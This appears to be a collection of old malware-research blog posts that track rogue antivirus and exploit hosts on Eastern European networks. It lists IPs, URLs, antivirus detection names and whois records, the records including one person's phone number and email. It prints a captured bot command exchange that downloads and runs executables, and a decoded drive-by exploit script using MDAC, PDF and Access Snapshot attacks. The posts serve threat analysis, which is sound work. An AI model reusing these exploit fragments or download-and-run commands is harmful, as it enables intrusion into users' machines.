Host: nua20090515.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:37:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
9a
#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
0

Another GET that appears to be a bot check in type request, note the lack of user agent.

GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0
Host: 85.13.236.154
User-Agent:
HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:39:28 GMT
Server: Apache/2.2.10 (Fedora)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache
Work-Server: 85.13.236.154
Content-Length: 0
Connection: close
Content-Type: text/html

That’s all the analysis I have time for at the moment, this is a very large attack encompasing many malicious payloads. Hopefully more analysis will follow.

Given the age of some of these events, I won’t be investigating any in detail but I will keep my eyes peeled for more.

94.247.2.245
3/26/2009    files.ms-load-av.com    /exe/setup_200002.exe

94.247.2.53
4/15/2009    megavipsite.cn    /installing/av/167.exe

94.247.2.84
2/12/2009    files.msas2009-download.com    /test/setup_200002.exe

94.247.3.151
3/25/2009    freewebhostguide.com    /index.php

94.247.3.40
4/24/2009    antivirusquickscanv2.com    /download/Install_2004.exe

94.247.2.195
3/26/2009    94.247.2.195    /news/

94.247.3.151
3/19/2009    zzzz.hostindianet.com    /load.php

94.247.2.215
3/27/2009    yourwebexamine.com    /installer_70127.exe

94.247.3.3
3/12/2009    securityscandirect.com    /download.php

94.247.2.22
4/7/2009    xviewworldmy2.com    /software/8a568adb2c/12205/1/Setup.exe

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Still Trade hosts a ton of fake/rogue anti virus domains and applications. We’ve seen these hosts pop up recently:

91.208.0.220
2008-12-01
scanner.rapidantivirus.com /setup/setup.exe – Fake AV

Trojan:Win32/FakePowav
FraudTool.Win32.ExtraAntivir.c
Win32/FakeAV!generic

91.208.0.221
2008-12-11
myprivatetubes09.net /cd/650/1749/wmpcdcs.exe – Zlob

DR/Zlob.Gen
TrojanDownloader:Win32/Renos.HB
Mal/Emogen-G

91.208.0.253
2008-12-03
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe – Zlob

Same as above

The following IPs are associated with malicious applications:

91.208.0.220
91.208.0.221
91.208.0.223
91.208.0.224
91.208.0.225
91.208.0.228
91.208.0.229
91.208.0.230
91.208.0.231
91.208.0.234
91.208.0.235
91.208.0.236
91.208.0.237
91.208.0.238
91.208.0.239
91.208.0.240
91.208.0.241
91.208.0.242
91.208.0.243
91.208.0.244
91.208.0.245
91.208.0.246
91.208.0.247
91.208.0.248
91.208.0.249
91.208.0.250
91.208.0.251
91.208.0.252
91.208.0.253
91.208.0.254

BISS also has a comprehensive list of domains and malware being served by these guys.

inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and it’s upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space:

92.62.100.0 – 92.62.101.255

92.62.100.68
2008-11-05
plotfive.cn /load.php

2008-11-12 /cache/doc.pdf

2008-11-22 /cache/doc.pdf

92.62.101.13
2008-10-24
tgspk.cn /zpl/pdf.php

92.62.101.53
2008-10-30
blufda.com /eez3a893/spl/pdf.pdf

2008-11-26 /u8899r5v/spl/pdf.pdf
/u8899r5v/exe.php

2008-12-17
kraspa.com /yg6cv7ar/spl/pdf.pdf

92.62.100.44
2008-09-18
92.62.100.44 /1/
/2/
92.62.100.43
2008-09-17
92.62.100.43 /1/
/2/

There’s quite a history here. From the looks of things, someone has been
moving around their malware from domain to domain on 92.62.101.53. All
of these sites are down as of this writing except kraspa.com. Lets dive
further into this site.

The first page I saw was kraspa.com /yg6cv7ar/spl/pdf.pdf however
this is not the whole story. When investigating that exact URL, pdf.pdf
is not found. This is curious as I saw the site earlier today. Backing up
to the root of kraspa.com, we get an index page. The index page contains
an iframe that points to a different directory. The malware author must
have coded his site to rotate directory names based on a certain criteria.
This makes investigation difficult if you can’t figure out where it will
send victims to next.

The next iframe I got contained:

src=”/ov9632l9/index.php”

The next page that comes into play is the exploit script index.php which
is detected as:

Trojan-Downloader.JS.Psyme.alv

Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and
the Microsoft Access Snapshot viewer. Here’s some of the script:

var p_url = “http://kraspa.com/ov9632l9/ztt.php”;
function MDAC(){

var nuc=”;
d8= 0;
var koSZV = document.createElement(“o”+nuc+”b”+nuc+”je”+nuc+”c”+nuc+”t”);
koSZV.setAttribute(“id”,”<”+nuc+”?=k”+nuc+”o”+nuc+”S”+nuc+”ZV?”+nuc+”>”);
[....]
function PDF()
{
document.write(‘<iframe src=”spl/pdf.pdf” width=1 height=1 style=”display:none”></iframe>’);
[....]
function SS()
{
var arbitrary_file = p_url;
var dest = ‘C:/AUTOEXEC.BAT’;
document.write(“<object classid=’clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9′ id=’attack’></object>”);
[....]
if (MDAC()||PDF()||SS()) { }
Detections for the malicious pdf:

JS:Agent-BQ
Exploit.RealPlr.K

The payload is a file called ztt.php, here are a few of the detections:

Trojan.Win32.Delf.gpg
Troj/Dloadr-BZT
Trojan.Win32.Delf.fyl

A quick submission to Threat Expert (report) and Anubis (report) reveal
further binaries that are downloaded. The .dat files are not exes, but a
type of binary data file.

Of particular interest is 79.143.177.43, another Latvian host with a
small /24 network. Might be worth keeping your eyes open for them too.

inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT

Some detections for 20026.exe, and file.exe:

BDS/Hupigon.Gen
Trojan.FakeAlert.Gen!Pac.2

Trojan.Crypt.LooksLike.XPACK
Trojan.FakeAlert.Gen!Pac.2

The FakeAlert signatures are correct, the threat ultimatly installs some
fake anti virus / anti spyware application.

]]> http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/feed/ 2